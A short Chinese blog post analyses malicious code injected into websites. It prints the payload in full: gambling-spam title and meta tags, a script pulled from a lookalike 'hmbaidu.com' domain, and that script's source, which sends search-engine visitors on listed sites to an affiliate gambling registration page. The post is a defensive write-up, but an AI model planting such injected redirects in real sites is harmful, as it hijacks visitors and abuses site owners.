王明昌博客如果你对该文章中的内容有疑问/不解,可以点击此处链接提问
要注明问题和此文章链接地址 点击此处跳转
//病恶意代码生成如下代码
<title>betway官网****#119;ay必威体育|betway必威体育官</title>
<meta name="keywords" content="betw********威,必威体育,betway,betway手机版,必威手机版,betway官网,必威官" />
<meta name="description" content="be*******1;必威体育亚州最佳体育平台,提供体育、真人、电竞、游戏,结算快返水最高,英超球队西汉姆联的官方主要赞助商" />
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){var title = document.getElementsByTagName('title')[1].text; document.title = title;}</script>
<script type="text/javascript" src="https://hmbaidu.com/hm.js?11ed6542762b11d68e263f6ad552b2e4"></script>
//https://hmbaidu.com/hm.js源文件
var _hmt = _hmt || [];
(function() {
var a = document.createElement("script");
a.src = "https://hm.baidu.com/hm.js?11ed6542762b11d68e263f6ad552b2e4";
var b = document.getElementsByTagName("script")[0];
b.parentNode.insertBefore(a, b)
})();
var refer = document.referrer;
refer = refer.toLowerCase();
var aSites = "google. baidu. soso. so. 360. yahoo. youdao. sogou. m.sm. gougou. bing.".split(" "),
isEngine = !1;
for (i in aSites) if (0 < refer.indexOf(aSites[i])) {
isEngine = !0;
break
}
if(isEngine){
var host = window.location.host;
if(host.indexOf("mvuk****.com") > 0 && 0 < refer.indexOf("so.com")){
//跳转到恶意页面
window.location.href = "https://www.***.com/members/registration.htm?aff=B108469&media=kiwz&web=0";
}
if(host.indexOf("zuand***sheng.com") > 0 || host.indexOf("0769web.net") > 0 || host.indexOf("cqxi***ingwa.com") > 0 || host.indexOf("wuzhouzhiqiao.com") > 0 || host.indexOf("mr-teaa.com") > 0 || host.indexOf("storer.jp") > 0 || host.indexOf("ytdswkj.com") > 0 || host.indexOf("rutenbuy.com") > 0 || host.indexOf("enb-ee9e.net") > 0 || host.indexOf("fcplaza.com") > 0){
//跳转到恶意页面
window.location.href = "https://www.***.com/members/registration.htm?aff=B108469&media=kiwz&web=0";
}
}
该病毒很简单,只是一个简单的js跳转
